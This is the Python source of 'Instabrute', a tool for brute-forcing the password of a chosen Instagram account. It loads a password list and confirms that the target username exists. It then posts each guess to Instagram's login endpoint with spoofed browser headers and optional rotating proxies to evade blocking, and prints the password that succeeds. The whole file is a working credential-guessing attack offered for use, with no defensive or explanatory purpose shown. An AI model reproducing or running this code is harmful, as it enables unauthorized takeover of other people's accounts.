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 LIST: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Fix and make proxy function better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Sort code again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Add help function to all "Yes/no" questions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Add help  function to "Press enter to exit input"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requets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#Help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Input(text):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value = ''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sys.version_info.major &gt;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value = input(text)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value = raw_input(text)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str(value)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#The main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Instabrute():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def __init__(self, username, passwordsFile='pass.txt'):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self.username = username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self.CurrentProxy = ''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self.UsedProxys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self.passwordsFile = passwordsFile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#Check if passwords file exists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self.loadPasswords()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#Check if username exists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self.IsUserExists()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UsePorxy = Input('[*] Do you want to use proxy (y/n): ').upper()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 (UsePorxy == 'Y' or UsePorxy == 'YES'):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self.randomProxy()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#Check if password file exists and check if he contain passwords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def loadPasswords(self):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if os.path.isfile(self.passwordsFile):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with open(self.passwordsFile) as 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self.passwords = f.read().splitlines()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passwordsNumber = len(self.passwords)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(passwordsNumber &gt; 0):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 ('[*] %s Passwords loads successfully' % passwordsNumber)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print('Password file are empty, Please add passwords to it.')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Input('[*] Press enter to exit')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exit()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print ('Please create passwords file named "%s"' % self.passwordsFile)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Input('[*] Press enter to exit')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exit()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#Choose random proxy from proxys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def randomProxy(self):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plist = open('proxy.txt').read().splitlines()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proxy = random.choice(plist)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if not proxy in self.UsedProxys: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self.CurrentProxy = proxy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self.UsedProxys.append(proxy)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print('')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print('[*] Check new ip...')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print ('[*] Your public ip: %s' % requests.get('http://myexternalip.com/raw', proxies={ "http": proxy, "https": proxy },timeout=10.0).text)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except Exception as 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print  ('[*] Can\'t reach proxy "%s"' % proxy)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print('')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#Check if username exists in instagram server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def IsUserExists(self):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 = requests.get('https://www.instagram.com/%s/?__a=1' % self.username)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(r.status_code == 404):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print ('[*] User named "%s" not found' % username)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Input('[*] Press enter to exit')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exit()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elif (r.status_code == 200):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#Try to login with password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def Login(self, password):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sess = requests.Session()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if len(self.CurrentProxy) &gt; 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sess.proxies = { "http": self.CurrentProxy, "https": self.CurrentProxy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#build requests headers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sess.cookies.update ({'sessionid' : '', 'mid' : '', 'ig_pr' : '1', 'ig_vw' : '1920', 'csrftoken' : '',  's_network' : '', 'ds_user_id' : ''})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sess.headers.update({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'UserAgent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',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'x-instagram-ajax':'1',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'X-Requested-With': 'XMLHttpRequest',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'origin': 'https://www.instagram.com',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'ContentType' : 'application/x-www-form-urlencoded',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'Connection': 'keep-alive',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'Accept': '*/*',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'Referer': 'https://www.instagram.com',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'authority': 'www.instagram.com',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'Host' : 'www.instagram.com',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'Accept-Language' : 'en-US;q=0.6,en;q=0.4',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'Accept-Encoding' : 'gzip, deflate'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#Update token after enter to the site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 = sess.get('https://www.instagram.com/')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sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']})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#Update token after login to the site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 = sess.post('https://www.instagram.com/accounts/login/ajax/', data={'username':self.username, 'password':password}, allow_redirects=True)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sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']})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#parse response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data = json.loads(r.text)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 (data['status'] == 'fail'):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print (data['message'])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UsePorxy = Input('[*] Do you want to use proxy (y/n): ').upper()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if (UsePorxy == 'Y' or UsePorxy == 'YES'):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('[$] Try to use proxy after fail.')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randomProxy() #Check that, may contain bugs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#return session if password is correct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(data['authenticated'] == True):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return sess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instabrute = Instabrute(Input('Please enter a username: '))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delayLoop = int(Input('[*] Please add delay between the bruteforce action (in seconds): '))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 ('[*] Error, software use the defult value "4"')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delayLoop = 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('')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 password in instabrute.passwords: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sess = instabrute.Login(password)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sess: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print ('[*] Login success %s' % [instabrute.username,password])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print ('[*] Password incorrect [%s]' % password)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time.sleep(delayLoop)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WantToExit = str(Input('Type y/n to exit: ')).upper()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if (WantToExit == 'Y' or WantToExit == 'YES'):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exit()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